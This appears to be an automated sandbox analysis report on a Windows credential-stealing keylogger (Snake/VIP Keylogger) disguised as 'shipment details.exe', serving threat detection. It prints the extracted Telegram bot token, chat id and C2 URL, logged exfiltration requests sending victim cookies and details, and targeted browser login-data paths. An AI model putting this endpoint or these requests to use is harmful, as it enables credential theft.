Edit tour

Windows Analysis Report
shipment details.exe

Overview

General Information

Sample name:	shipment details.exe
Analysis ID:	1529185
MD5:	606686ad6a08ebe2cc694b5618cfaab5
SHA1:	06f5f2c91d2a4c7e02547ed997a4db3b92352971
SHA256:	f13526451639d7df1a8100047250b017cbfc065ce1271b6ffa30bc49de024d54
Tags:	exeuser-threatcat_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code references suspicious native API functions

AI detected suspicious sample

Machine Learning detection for sample

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

shipment details.exe (PID: 5564 cmdline: "C:\Users\user\Desktop\shipment details.exe" MD5: 606686AD6A08EBE2CC694B5618CFAAB5)

shipment details.exe (PID: 4788 cmdline: "C:\Users\user\Desktop\shipment details.exe" MD5: 606686AD6A08EBE2CC694B5618CFAAB5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendMessage"}

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8", "Chat id": "2135869667"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8", "Chat_id": "2135869667", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.4523008463.0000000005420000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x6dc6b:$x1: In$J$ct0r
00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2df2c:$a1: get_encryptedPassword 0x2e249:$a2: get_encryptedUsername 0x2dd3c:$a3: get_timePasswordChanged 0x2de45:$a4: get_passwordField 0x2df42:$a5: set_encryptedPassword 0x2f5b8:$a7: get_logins 0x2f51b:$a10: KeyLoggerEventArgs 0x2f180:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x20a75c:$a1: get_encryptedPassword 0x24e18c:$a1: get_encryptedPassword 0x2919ac:$a1: get_encryptedPassword 0x20aa79:$a2: get_encryptedUsername 0x24e4a9:$a2: get_encryptedUsername 0x291cc9:$a2: get_encryptedUsername 0x20a56c:$a3: get_timePasswordChanged 0x24df9c:$a3: get_timePasswordChanged 0x2917bc:$a3: get_timePasswordChanged 0x20a675:$a4: get_passwordField 0x24e0a5:$a4: get_passwordField 0x2918c5:$a4: get_passwordField 0x20a772:$a5: set_encryptedPassword 0x24e1a2:$a5: set_encryptedPassword 0x2919c2:$a5: set_encryptedPassword 0x20bde8:$a7: get_logins 0x24f818:$a7: get_logins 0x293038:$a7: get_logins 0x20bd4b:$a10: KeyLoggerEventArgs 0x24f77b:$a10: KeyLoggerEventArgs 0x292f9b:$a10: KeyLoggerEventArgs
Process Memory Space: shipment details.exe PID: 5564	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: shipment details.exe PID: 5564	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: shipment details.exe PID: 5564	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: shipment details.exe PID: 5564	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: shipment details.exe PID: 5564	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x87fe9:$a1: get_encryptedPassword 0x8825c:$a2: get_encryptedUsername 0x87e1c:$a3: get_timePasswordChanged 0x87f0c:$a4: get_passwordField 0x87fff:$a5: set_encryptedPassword 0x89e9c:$a7: get_logins 0x89e1d:$a10: KeyLoggerEventArgs 0x89b96:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: shipment details.exe PID: 4788	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: shipment details.exe PID: 4788	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: shipment details.exe PID: 4788	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: shipment details.exe PID: 4788	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1367a5:$a1: get_encryptedPassword 0x136ab8:$a2: get_encryptedUsername 0x1365bf:$a3: get_timePasswordChanged 0x1366c8:$a4: get_passwordField 0x1367bb:$a5: set_encryptedPassword 0x138c6b:$a7: get_logins 0x138bce:$a10: KeyLoggerEventArgs 0x138837:$a11: KeyLoggerEventArgsEventHandler
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.shipment details.exe.5420000.6.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x6be6b:$x1: In$J$ct0r
0.2.shipment details.exe.3b4ad70.4.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x6be6b:$x1: In$J$ct0r
0.2.shipment details.exe.5420000.6.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x6dc6b:$x1: In$J$ct0r
0.2.shipment details.exe.3cf9060.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.shipment details.exe.3cf9060.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.shipment details.exe.3cf9060.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.shipment details.exe.3cf9060.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c32c:$a1: get_encryptedPassword 0x2c649:$a2: get_encryptedUsername 0x2c13c:$a3: get_timePasswordChanged 0x2c245:$a4: get_passwordField 0x2c342:$a5: set_encryptedPassword 0x2d9b8:$a7: get_logins 0x2d91b:$a10: KeyLoggerEventArgs 0x2d580:$a11: KeyLoggerEventArgsEventHandler
0.2.shipment details.exe.3cf9060.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39fff:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x396a2:$a3: \Google\Chrome\User Data\Default\Login Data 0x398ff:$a4: \Orbitum\User Data\Default\Login Data 0x3a2de:$a5: \Kometa\User Data\Default\Login Data
0.2.shipment details.exe.3cf9060.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2cf34:$s1: UnHook 0x2cf3b:$s2: SetHook 0x2cf43:$s3: CallNextHook 0x2cf50:$s4: _hook
1.2.shipment details.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.shipment details.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.shipment details.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.shipment details.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.shipment details.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e12c:$a1: get_encryptedPassword 0x2e449:$a2: get_encryptedUsername 0x2df3c:$a3: get_timePasswordChanged 0x2e045:$a4: get_passwordField 0x2e142:$a5: set_encryptedPassword 0x2f7b8:$a7: get_logins 0x2f71b:$a10: KeyLoggerEventArgs 0x2f380:$a11: KeyLoggerEventArgsEventHandler
1.2.shipment details.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bdff:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b4a2:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b6ff:$a4: \Orbitum\User Data\Default\Login Data 0x3c0de:$a5: \Kometa\User Data\Default\Login Data
1.2.shipment details.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ed34:$s1: UnHook 0x2ed3b:$s2: SetHook 0x2ed43:$s3: CallNextHook 0x2ed50:$s4: _hook
0.2.shipment details.exe.2b27b10.1.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xa491c:$x1: In$J$ct0r 0xa58cc:$a1: WriteProcessMemory 0xa5958:$a1: WriteProcessMemory 0xa5a2c:$a4: VirtualAllocEx 0xa5c50:$a4: VirtualAllocEx 0xa5cd0:$a4: VirtualAllocEx
0.2.shipment details.exe.2b2a350.0.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xa20dc:$x1: In$J$ct0r 0xa308c:$a1: WriteProcessMemory 0xa3118:$a1: WriteProcessMemory 0xa31ec:$a4: VirtualAllocEx 0xa3410:$a4: VirtualAllocEx 0xa3490:$a4: VirtualAllocEx
0.2.shipment details.exe.3cb5630.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.shipment details.exe.3cb5630.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.shipment details.exe.3cb5630.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.shipment details.exe.3cb5630.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c32c:$a1: get_encryptedPassword 0x2c649:$a2: get_encryptedUsername 0x2c13c:$a3: get_timePasswordChanged 0x2c245:$a4: get_passwordField 0x2c342:$a5: set_encryptedPassword 0x2d9b8:$a7: get_logins 0x2d91b:$a10: KeyLoggerEventArgs 0x2d580:$a11: KeyLoggerEventArgsEventHandler
0.2.shipment details.exe.3cb5630.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39fff:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x396a2:$a3: \Google\Chrome\User Data\Default\Login Data 0x398ff:$a4: \Orbitum\User Data\Default\Login Data 0x3a2de:$a5: \Kometa\User Data\Default\Login Data
0.2.shipment details.exe.3cb5630.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2cf34:$s1: UnHook 0x2cf3b:$s2: SetHook 0x2cf43:$s3: CallNextHook 0x2cf50:$s4: _hook
0.2.shipment details.exe.3cf9060.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.shipment details.exe.3cf9060.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.shipment details.exe.3cf9060.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.shipment details.exe.3cf9060.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.shipment details.exe.3cf9060.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e12c:$a1: get_encryptedPassword 0x7194c:$a1: get_encryptedPassword 0x2e449:$a2: get_encryptedUsername 0x71c69:$a2: get_encryptedUsername 0x2df3c:$a3: get_timePasswordChanged 0x7175c:$a3: get_timePasswordChanged 0x2e045:$a4: get_passwordField 0x71865:$a4: get_passwordField 0x2e142:$a5: set_encryptedPassword 0x71962:$a5: set_encryptedPassword 0x2f7b8:$a7: get_logins 0x72fd8:$a7: get_logins 0x2f71b:$a10: KeyLoggerEventArgs 0x72f3b:$a10: KeyLoggerEventArgs 0x2f380:$a11: KeyLoggerEventArgsEventHandler 0x72ba0:$a11: KeyLoggerEventArgsEventHandler
0.2.shipment details.exe.3cf9060.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bdff:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7f61f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b4a2:$a3: \Google\Chrome\User Data\Default\Login Data 0x7ecc2:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b6ff:$a4: \Orbitum\User Data\Default\Login Data 0x7ef1f:$a4: \Orbitum\User Data\Default\Login Data 0x3c0de:$a5: \Kometa\User Data\Default\Login Data 0x7f8fe:$a5: \Kometa\User Data\Default\Login Data
0.2.shipment details.exe.3cf9060.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ed34:$s1: UnHook 0x72554:$s1: UnHook 0x2ed3b:$s2: SetHook 0x7255b:$s2: SetHook 0x2ed43:$s3: CallNextHook 0x72563:$s3: CallNextHook 0x2ed50:$s4: _hook 0x72570:$s4: _hook
0.2.shipment details.exe.3cb5630.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.shipment details.exe.3cb5630.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.shipment details.exe.3cb5630.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.shipment details.exe.3cb5630.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.shipment details.exe.3cb5630.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e12c:$a1: get_encryptedPassword 0x71b5c:$a1: get_encryptedPassword 0xb537c:$a1: get_encryptedPassword 0x2e449:$a2: get_encryptedUsername 0x71e79:$a2: get_encryptedUsername 0xb5699:$a2: get_encryptedUsername 0x2df3c:$a3: get_timePasswordChanged 0x7196c:$a3: get_timePasswordChanged 0xb518c:$a3: get_timePasswordChanged 0x2e045:$a4: get_passwordField 0x71a75:$a4: get_passwordField 0xb5295:$a4: get_passwordField 0x2e142:$a5: set_encryptedPassword 0x71b72:$a5: set_encryptedPassword 0xb5392:$a5: set_encryptedPassword 0x2f7b8:$a7: get_logins 0x731e8:$a7: get_logins 0xb6a08:$a7: get_logins 0x2f71b:$a10: KeyLoggerEventArgs 0x7314b:$a10: KeyLoggerEventArgs 0xb696b:$a10: KeyLoggerEventArgs
0.2.shipment details.exe.3cb5630.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bdff:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7f82f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc304f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b4a2:$a3: \Google\Chrome\User Data\Default\Login Data 0x7eed2:$a3: \Google\Chrome\User Data\Default\Login Data 0xc26f2:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b6ff:$a4: \Orbitum\User Data\Default\Login Data 0x7f12f:$a4: \Orbitum\User Data\Default\Login Data 0xc294f:$a4: \Orbitum\User Data\Default\Login Data 0x3c0de:$a5: \Kometa\User Data\Default\Login Data 0x7fb0e:$a5: \Kometa\User Data\Default\Login Data 0xc332e:$a5: \Kometa\User Data\Default\Login Data
0.2.shipment details.exe.3cb5630.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ed34:$s1: UnHook 0x72764:$s1: UnHook 0xb5f84:$s1: UnHook 0x2ed3b:$s2: SetHook 0x7276b:$s2: SetHook 0xb5f8b:$s2: SetHook 0x2ed43:$s3: CallNextHook 0x72773:$s3: CallNextHook 0xb5f93:$s3: CallNextHook 0x2ed50:$s4: _hook 0x72780:$s4: _hook 0xb5fa0:$s4: _hook
0.2.shipment details.exe.3b4ad70.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.shipment details.exe.3b4ad70.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.shipment details.exe.3b4ad70.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.shipment details.exe.3b4ad70.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.shipment details.exe.3b4ad70.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1989ec:$a1: get_encryptedPassword 0x1dc41c:$a1: get_encryptedPassword 0x21fc3c:$a1: get_encryptedPassword 0x198d09:$a2: get_encryptedUsername 0x1dc739:$a2: get_encryptedUsername 0x21ff59:$a2: get_encryptedUsername 0x1987fc:$a3: get_timePasswordChanged 0x1dc22c:$a3: get_timePasswordChanged 0x21fa4c:$a3: get_timePasswordChanged 0x198905:$a4: get_passwordField 0x1dc335:$a4: get_passwordField 0x21fb55:$a4: get_passwordField 0x198a02:$a5: set_encryptedPassword 0x1dc432:$a5: set_encryptedPassword 0x21fc52:$a5: set_encryptedPassword 0x19a078:$a7: get_logins 0x1ddaa8:$a7: get_logins 0x2212c8:$a7: get_logins 0x199fdb:$a10: KeyLoggerEventArgs 0x1dda0b:$a10: KeyLoggerEventArgs 0x22122b:$a10: KeyLoggerEventArgs
0.2.shipment details.exe.3b4ad70.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1995f4:$s1: UnHook 0x1dd024:$s1: UnHook 0x220844:$s1: UnHook 0x1995fb:$s2: SetHook 0x1dd02b:$s2: SetHook 0x22084b:$s2: SetHook 0x199603:$s3: CallNextHook 0x1dd033:$s3: CallNextHook 0x220853:$s3: CallNextHook 0x199610:$s4: _hook 0x1dd040:$s4: _hook 0x220860:$s4: _hook
0.2.shipment details.exe.3b4ad70.4.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x6dc6b:$x1: In$J$ct0r
Click to see the 40 entries

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T18:21:08.091215+0200	2803305	3	Unknown Traffic	192.168.2.5	49709	188.114.97.3	443	TCP
2024-10-08T18:21:09.602566+0200	2803305	3	Unknown Traffic	192.168.2.5	49711	188.114.97.3	443	TCP
2024-10-08T18:21:12.107618+0200	2803305	3	Unknown Traffic	192.168.2.5	49717	188.114.97.3	443	TCP
2024-10-08T18:21:14.310424+0200	2803305	3	Unknown Traffic	192.168.2.5	49719	188.114.97.3	443	TCP
2024-10-08T18:21:19.864976+0200	2803305	3	Unknown Traffic	192.168.2.5	49725	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T18:21:05.525980+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	158.101.44.242	80	TCP
2024-10-08T18:21:07.510383+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	158.101.44.242	80	TCP
2024-10-08T18:21:08.729084+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49710	158.101.44.242	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8", "Chat_id": "2135869667", "Version": "4.4"}
Source: 0.2.shipment details.exe.3cb5630.3.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8", "Chat id": "2135869667"}
Source: shipment details.exe.4788.1.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendMessage"}

Multi AV Scanner detection for submitted file

Source: shipment details.exe

ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: shipment details.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: shipment details.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2

Source: shipment details.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: shipment details.exe, 00000000.00000002.4520240685.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000000.00000002.4522683819.00000000053C0000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\shipment details.exe	Code function: 4x nop then jmp 0133F45Dh	1_2_0133F2C0
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 4x nop then jmp 0133F45Dh	1_2_0133F4AC
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 4x nop then jmp 0133FC19h	1_2_0133F960
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 4x nop then jmp 06BD31E0h	1_2_06BD2DC8
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 4x nop then jmp 06BD0D0Dh	1_2_06BD0B30
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 4x nop then jmp 06BD1697h	1_2_06BD0B30
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 4x nop then jmp 06BD2C19h	1_2_06BD2968
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 4x nop then jmp 06BDE959h	1_2_06BDE6B0
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 4x nop then jmp 06BDE0A9h	1_2_06BDDE00
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 4x nop then jmp 06BDF209h	1_2_06BDEF60
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 4x nop then jmp 06BDCF49h	1_2_06BDCCA0
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 4x nop then jmp 06BD31E0h	1_2_06BD2DC2
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 4x nop then jmp 06BDD7F9h	1_2_06BDD550
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 4x nop then jmp 06BDE501h	1_2_06BDE258
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 4x nop then jmp 06BDF661h	1_2_06BDF3B8
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 4x nop then jmp 06BDEDB1h	1_2_06BDEB08
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 4x nop then jmp 06BDD3A1h	1_2_06BDD0F8
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 4x nop then jmp 06BDFAB9h	1_2_06BDF810
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	1_2_06BD0040
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 4x nop then jmp 06BDDC51h	1_2_06BDD9A8
Source: C:\Users\user\Desktop\shipment details.exe	Code function: 4x nop then jmp 06BD31E0h	1_2_06BD310E

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20and%20Time:%2009/10/2024%20/%2004:32:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20571345%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendDocument?chat_id=2135869667&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce87960e4dfa2Host: api.telegram.orgContent-Length: 1257

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

